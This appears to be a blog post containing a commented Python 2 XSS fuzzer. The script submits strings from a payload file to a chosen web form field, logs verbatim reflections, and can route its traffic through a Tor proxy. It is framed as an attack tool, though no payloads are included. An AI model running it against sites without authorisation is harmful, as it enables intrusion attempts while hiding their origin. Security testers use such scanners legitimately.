I have also added Tor support, mainly to learn how to implement proxy support in future tools. If no Tor proxy is given when the script is run, it will not use Tor.
#!/usr/bin/python
import sys
import mechanize
import socks
import socket
import urllib
import re
def torProxy(torIP):
    """Route sockets created by this process through a SOCKS5 proxy.

    torIP is a "host:port" string. The proxy becomes the socks module's
    default, socket.socket is replaced for the whole process, and the
    address reported by get_external_ip() is printed.
    """
    pieces = torIP.split(":")
    proxy_host = pieces[0]
    proxy_port = int(pieces[1])
    socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, proxy_host, proxy_port)
    # Process-wide monkey-patch: it stays in place even if the lookup below
    # raises, because nothing here restores the original socket class.
    socket.socket = socks.socksocket
    # NOTE(review): only the socket class is swapped; code that resolves host
    # names with socket.getaddrinfo() before connecting would presumably
    # still do that lookup outside the proxy -- confirm.
    print("\nConnecting to TOR proxy: " + torIP)
    # The printed value is whatever the lookup service reports; it is not
    # compared with the local address or otherwise verified.
    print("Using TOR address: " + get_external_ip())
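def get_external_ip():
    """Return the first IPv4 address found in the checkip.dyndns.org reply.

    The lookup is a plain-HTTP request, so the reply is unauthenticated and
    the returned value should be treated as informational only.

    Raises:
        ValueError: the reply contained no dotted-quad address.
    """
    reply = urllib.urlopen("http://checkip.dyndns.org/")
    try:
        site = reply.read()
    finally:
        # Release the connection even when the read fails.
        reply.close()
    # Dots are escaped and one-digit octets are accepted. The earlier pattern
    # used a bare "." (any character) and required two digits per octet, so
    # an address such as 10.0.0.1 was never matched.
    grab = re.findall(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', site)
    if not grab:
        raise ValueError("no IPv4 address in reply from checkip.dyndns.org")
    return grab[0]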
def printforms():
    """Print a banner, then every form on the browser's current page.

    Uses the module-level mechanize browser ``br``; the script opens the
    target URL on it before calling this function.
    """
    banner = """
 ###################################################
 ###################################################
   Available Forms
 ###################################################
 ###################################################
 """
    print(banner)
    for entry in br.forms():
        print(entry)
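def beginAttack(form_no, form_field):
    """Submit each string in ``attacks`` to one form field and log reflections.

    Appends to the file XSS_RESULTS in the current directory. A header
    carrying sys.argv[2] is written first; then, for every test string, the
    form is selected, the field is set, the form is submitted, and the
    string is logged through xssFound() when it appears verbatim in the
    response body.

    Args:
        form_no: zero-based index of the form on the page held by ``br``.
        form_field: name of the control that receives each test string.

    A verbatim match only shows that the input came back unmodified; whether
    it is active in the rendered context still has to be confirmed by hand.
    """
    # The with-block closes the results file on every exit path, including
    # the early return below (the original leaked the handle there).
    with open("XSS_RESULTS", "a") as results:
        results.write("\n*************************************\n" + sys.argv[2] + "\n*************************************\n")
        for line in attacks:
            print("Trying :" + line)
            try:
                # NOTE(review): nothing reloads the original page between
                # iterations, so after the first submit select_form()
                # presumably addresses the response page -- confirm.
                br.select_form(nr=form_no)
                br.form[form_field] = line
                br.submit()
                reflected = line in br.response().read()
            except Exception as exc:
                # A failed request is not evidence of a reflection, so it is
                # recorded under its own label instead of as an XSS finding.
                # Exception (not a bare except) lets Ctrl-C through.
                print("XXXXXXXXX Some kind of crash! XXXXXXXXXXXXX")
                results.write("Form no: " + str(form_no) + "\n")
                results.write("Form field: " + form_field + "\n")
                results.write("ERROR (request failed, not a reflection): " + line + " -- " + repr(exc) + "\n")
                # As before, the run stops at the first failure.
                return
            if reflected:
                xssFound(line, results, form_no)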
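def xssFound(line, file, form_no, field=None):
    """Append one finding to the results log.

    Args:
        line: the submitted string that was found in the response.
        file: writable file-like object receiving the log entry.
        form_no: index of the form that was submitted.
        field: name of the form field. When omitted, the module-level
            ``form_field`` set by the script is used, which keeps existing
            three-argument calls working.
    """
    if field is None:
        # The original always read this global, so the function failed with
        # NameError unless the script had already assigned it.
        field = form_field
    file.write("Form no: " + str(form_no) + "\n")
    file.write("Form field: " + field + "\n")
    file.write("XSS: " + line + "\n")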
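# Script body: parse arguments, optionally set up the proxy, load the test
# strings, open the target page, then prompt for the form and field to test.
# ("global" at module level was a no-op and has been dropped.)
attacks = []  # test strings read from the file named in argv[1]

# The payload file and the target URL are both required.
if len(sys.argv) < 3:
    print("\nUsage: XSS <file> <url> <127.0.0.1:9150>(optional)\n")
    sys.exit(1)

# Proxy setup runs only when a third argument was given; previously a missing
# argument was reported as "Unable to connect to TOR".
if len(sys.argv) > 3:
    try:
        torProxy(sys.argv[3])
    except Exception as exc:
        # torProxy replaces socket.socket before its address lookup, so a
        # failure can leave the process half-configured. Stop here instead of
        # continuing with a proxy setting the user asked for but did not get.
        print("Unable to connect to TOR: " + repr(exc))
        sys.exit(1)

try:
    print("\nImporting attacks from : " + sys.argv[1])
    with open(sys.argv[1], "r") as payload_file:
        for raw in payload_file:
            entry = raw.strip()
            # An empty string is contained in every response body, so a blank
            # line in the file would be logged as a finding on every run.
            if entry:
                attacks.append(entry)
    print("Import Successfull")
except IOError as exc:
    print("Unable to read " + sys.argv[1] + ": " + str(exc))
    print("\nUsage: XSS <file> <url> <127.0.0.1:9150>(optional)\n")
    sys.exit(1)

# Initialize the Browser object and open the url
try:
    br = mechanize.Browser()
    br.open(sys.argv[2])
except Exception as exc:
    # Report the actual failure; the arguments were already validated above.
    print("Unable to open " + sys.argv[2] + ": " + repr(exc))
    sys.exit(1)

printforms()
print("\nSelect the form number (starting from 0) and the field in brackets without the equals sign.")
try:
    form_no = int(raw_input("Form number: "))
except ValueError:
    print("Form number must be an integer")
    sys.exit(1)
form_field = raw_input("Form field: ")
beginAttack(form_no, form_field)
print("Attack Complete")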
Output:

 